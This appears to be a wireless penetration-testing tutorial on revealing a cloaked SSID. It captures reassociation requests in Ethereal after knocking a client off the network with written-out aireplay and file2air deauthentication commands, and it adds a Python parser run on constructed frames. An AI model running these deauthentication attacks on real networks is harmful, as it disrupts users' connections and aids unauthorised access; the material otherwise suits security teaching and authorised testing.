It is possible to use Kismet or Airodump to capture the packets in this process, but I have found that Ethereal is the most consistent, so I will only discuss the procedure for obtaining a cloaked SSID using Ethereal.

Start Ethereal with the required filters preloaded:

#start-ethereal

From the toolbar select Capture → Interfaces → ath0 Prepare

In the filters box, click the down arrow and select:

wlan.fc.type_subtype == 2

Click the tick button to apply.

Now deauthenticate a connected client:

Use either:

#aireplay -0 1 -a <AP_MAC> -c <Client_MAC> ath0

or

#file2air -i ath0 -r madwifi -f /KNOPPIX/files/deauth.bin -c <channel> -n 5000 -d <Client_MAC> -b <BSSID> -s <AP_MAC>

NOTE: THIS CAN CAUSE THE KERNEL TO CRASH

If this fails to produce the reassociation request, you will have to try one or more of the following:

Move closer to the target
Use a high gain antenna
Increase the number after the -n from 5000
Try a different .bin file, such as beacon.bin
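
Why the filter value 2 is the one that matters: it selects reassociation requests, and those frames carry the SSID as a plain-text information element even when the access point leaves it out of its beacons, which is why cloaking is not an access control. The parser below is an added example, not part of the original procedure; the frame bytes, MAC addresses and SSID are constructed, and it assumes a raw 802.11 frame with no radiotap header or FCS.

```python
import struct

MGMT_HDR_LEN = 24        # frame control, duration, 3 addresses, sequence control
REASSOC_FIXED_LEN = 10   # capability (2) + listen interval (2) + current AP (6)
REASSOC_REQ = 0x02       # the value matched by wlan.fc.type_subtype == 2
SSID_IE = 0              # element ID of the SSID information element


def type_subtype(frame: bytes) -> int:
    """Combine frame type and subtype the way the display filter field does."""
    fc0 = frame[0]
    ftype = (fc0 >> 2) & 0x3
    subtype = (fc0 >> 4) & 0xF
    return (ftype << 4) | subtype


def ssid_from_reassoc(frame: bytes):
    """Return the SSID carried in a reassociation request, else None."""
    if len(frame) < MGMT_HDR_LEN + REASSOC_FIXED_LEN:
        return None
    if type_subtype(frame) != REASSOC_REQ:
        return None
    pos = MGMT_HDR_LEN + REASSOC_FIXED_LEN
    while pos + 2 <= len(frame):          # walk the tagged parameters
        ie_id, ie_len = frame[pos], frame[pos + 1]
        data = frame[pos + 2: pos + 2 + ie_len]
        if len(data) < ie_len:
            return None                   # truncated element
        if ie_id == SSID_IE:
            return data.decode("utf-8", errors="replace")
        pos += 2 + ie_len
    return None


def build_sample(fc0: int, ssid: bytes) -> bytes:
    """Constructed frame with made-up addresses (not a real capture)."""
    client = bytes.fromhex("020000000001")
    ap = bytes.fromhex("020000000002")
    hdr = struct.pack("<BBH", fc0, 0, 0) + ap + client + ap + struct.pack("<H", 0)
    fixed = struct.pack("<HH", 0x0421, 10) + ap
    ies = bytes([SSID_IE, len(ssid)]) + ssid + bytes([1, 2, 0x82, 0x84])
    return hdr + fixed + ies


SAMPLE_REASSOC = build_sample(0x20, b"ExampleNet")   # type 0, subtype 2
SAMPLE_OTHER = build_sample(0x80, b"ExampleNet")     # type 0, subtype 8

if __name__ == "__main__":
    print(ssid_from_reassoc(SAMPLE_REASSOC))
```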